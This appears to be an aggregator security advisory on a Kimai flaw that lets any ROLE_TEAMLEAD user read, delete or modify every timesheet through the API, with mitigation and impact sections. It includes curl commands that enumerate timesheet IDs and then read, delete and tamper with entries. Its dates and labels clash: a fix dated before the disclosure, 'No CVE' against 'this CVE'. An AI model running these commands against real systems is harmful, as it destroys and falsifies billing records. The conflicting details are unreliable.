Kimai, Authorization Bypass via Global Permissions, No CVE (Critical)

By /

Listen to this Post

How the mentioned vulnerability works:

  1. In Kimai versions ≤2.55, the `TimesheetVoter::voteOnAttribute()` class handles permission checks for timesheet operations.
  2. The voter maps permissions to either `own_timesheet` or `other_timesheet` based on whether the subject timesheet belongs to the requesting user.
  3. A developer comment inside the code explicitly states: // extend me for "team" support later on, confirming that team membership was never validated.
  4. The role `ROLE_TEAMLEAD` is granted permissions `edit_other_timesheet` and `delete_other_timesheet` by design.
  5. These permissions are global – not scoped to teams the teamlead belongs to.
  6. The API endpoints `/api/timesheets/{id}` fully honor these documented permissions.
  7. Any authenticated user with `ROLE_TEAMLEAD` can read any timesheet record by its numeric ID via GET request.
  8. They can delete any timesheet via DELETE request, returning HTTP 204.
  9. They can modify any timesheet via PATCH request, changing begin/end times, description, billable flag, etc.
  10. Timesheet IDs are sequential integers, making enumeration trivial (e.g., ID 1,2,3…).
  11. The UI only shows teamlead’s own team timesheets, but the API has no such filtering.
  12. Lower `ROLE_USER` accounts are correctly blocked (returns 403 or empty arrays).
  13. The maintainers acknowledge this behavior matches the documented permission model and is not a vulnerability but a missing feature.
  14. Team-scoped enforcement was always planned as an enhancement, not a security boundary.
  15. Nevertheless, the impact includes data destruction, tampering of billable hours, and full authorization bypass on timesheet resources.
  16. No user interaction is required beyond having ROLE_TEAMLEAD.
  17. The issue was verified against Kimai 2.52.0 Docker instance.
  18. Kimai 2.56.0 introduced team-scoped timesheet permission checks as a feature.
  19. Operators of older versions must avoid granting `ROLE_TEAMLEAD` to users who need isolation.
  20. The vulnerability is effectively a design flaw that becomes a security risk in multi-tenant or team-isolated deployments.

dailycve form:

Platform: Kimai
Version: ≤2.55
Vulnerability: Global timesheet access
Severity: Critical
date: 2026-03-24

Prediction: Fixed 2.56.0 (2025-05-15)

What Undercode Say:

Enumerate timesheet IDs (sequential)
for i in {1..100}; do
curl -s -o /dev/null -w "%{http_code} %{url}\n" -H "X-AUTH-USER: teamlead" -H "X-AUTH-TOKEN: token" "https://kimai.example/api/timesheets/$i"
done
Read arbitrary timesheet
curl -H "X-AUTH-USER: teamlead" -H "X-AUTH-TOKEN: token" "https://kimai.example/api/timesheets/2"
Delete timesheet
curl -X DELETE -H "X-AUTH-USER: teamlead" -H "X-AUTH-TOKEN: token" "https://kimai.example/api/timesheets/3"
Tamper timesheet (inflate hours)
curl -X PATCH -H "X-AUTH-USER: teamlead" -H "X-AUTH-TOKEN: token" -H "Content-Type: application/json" \
-d '{"begin":"2026-03-24T08:00:00","end":"2026-03-24T18:00:00","description":"TAMPERED"}' \
"https://kimai.example/api/timesheets/6"

Exploit:

  • Authenticate as any `ROLE_TEAMLEAD` user via API token or basic auth.
  • Guess or iterate timesheet IDs (small integer range).
  • Send GET request to read full record including private descriptions and durations.
  • Send DELETE request to permanently remove timesheet – no confirmation required.
  • Send PATCH request to modify begin/end times (changing billable hours), description, or billable flag.
  • No team membership check is performed; all other users’ timesheets are accessible.

Protection from this CVE

  • Upgrade to Kimai 2.56.0 or later where team-scoped permissions are enforced.
  • If upgrade not possible, do not assign `ROLE_TEAMLEAD` to users who must not access other teams’ timesheets.
  • Use application firewall to block API requests to `/api/timesheets/` for untrusted `ROLE_TEAMLEAD` users as a temporary workaround.
  • Monitor API access logs for unusual GET/DELETE/PATCH patterns on timesheet endpoints.
  • Implement custom voter or override `TimesheetVoter` to add team membership checks (code modification required).

Impact

  • Permanent deletion of any user’s timesheets → loss of billable hours, payroll records, project billing history.
  • Silent modification of timesheet durations (e.g., inflating 1h to 10h) → fraudulent invoicing and payroll theft.
  • Overwriting descriptions and billable flags → corrupted audit trails and false reporting.
  • Full enumeration of all timesheet IDs → attacker can map activity across the entire system.
  • No user interaction or victim action required; trivial to execute with basic API access.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top